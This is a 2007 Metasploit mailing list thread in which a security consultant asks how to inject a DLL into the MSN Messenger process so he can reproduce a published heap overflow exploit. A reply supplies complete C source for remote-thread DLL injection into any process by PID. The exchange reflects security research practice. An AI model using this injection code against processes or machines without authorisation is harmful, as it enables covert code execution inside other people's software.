Metasploit mailing list archives
DLL Process Injection
From: danuxx at gmail.com (Danux)
Date: Fri, 14 Sep 2007 14:44:05 -0500
Wonderfulllllllll!!!! thats what i was looking for Thanks friends On 9/14/07, Pusscat <pusscat at metasploit.com> wrote:
Try this: #include <windows.h> #include <stdlib.h> #include <stdio.h> int main(int argc, char **argv) { HRESULT Status; HANDLE process; DWORD pid; HANDLE processHandle = 0; HANDLE threadHandle = 0; LPVOID stringAddress = NULL; LPCSTR dllName = NULL; ULONG64 funcAddr64; ULONG *funcAddr, i; if (argc < 3) { printf("injectDLL <dll to inject> <pid to inject into>\n\n"); return (0); } pid = strtoul(argv[2], NULL, 10); dllName = argv[1]; printf("Injecting DLL %s into pid %d... ", argv[1], pid); if(!(processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid))){ printf("OpenProcess() failed\n"); return (-1); } if(!(stringAddress = VirtualAllocEx(processHandle, NULL, strlen(dllName), MEM_COMMIT, PAGE_EXECUTE_READWRITE))) { printf("VirtualAllocEx() failed.\n"); CloseHandle(processHandle); return (-1); } if(!WriteProcessMemory(processHandle, (LPVOID)stringAddress, dllName, strlen(dllName), NULL)) { printf("WriteProcessMemory() failed.\n"); VirtualFreeEx(processHandle, stringAddress, strlen(dllName), MEM_DECOMMIT); CloseHandle(processHandle); return (-1); } printf("DLL Injected.\n"); if(!(threadHandle = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(LoadLibrary("kernel32.dll"), "LoadLibraryA"), (LPVOID)stringAddress, 0, NULL))) { printf("CreateRemoteThread() failed.\n"); VirtualFreeEx(processHandle, stringAddress, strlen(dllName), MEM_DECOMMIT); CloseHandle(processHandle); return (-1); } CloseHandle(threadHandle); CloseHandle(processHandle); return (0); } ~ Puss -----Original Message----- From: Danux [mailto:danuxx at gmail.com] Sent: Friday, September 14, 2007 1:24 PM To: framework at metasploit.com Subject: [framework] DLL Process Injection Hi, i dont know if this is the right place to ask, but i know you have the skill to help me. Recently i was trying to reporduce a new exploit, i mean: MSN messenger 7.x (8.0?) VIDEO Remote Heap Overflow Exploit, But following the instructions on milw0rm: http://www.milw0rm.com/sploits/08292007-exp_msn.rar They say i need to: "inject the dll to msn messenger .... process. I know metasploit already works that way but i would like to learn how to do it manually. I have no skill about DLL programming nor injection, do you have a tutorial or something like that to understand it? Thanks in advance. -- Danux, CISSP Chief Information Security Officer Macula Security Consulting Group www.macula-group.com
-- Danux, CISSP Chief Information Security Officer Macula Security Consulting Group www.macula-group.com
Current thread:
- DLL Process Injection Danux (Sep 14)
- DLL Process Injection H D Moore (Sep 14)
- DLL Process Injection Pusscat (Sep 14)
- DLL Process Injection Danux (Sep 14)
- <Possible follow-ups>
- DLL Process Injection Michael Brandt asmael () att net (Sep 14)
- Fwd: Re: DLL Process Injection H D Moore (Sep 14)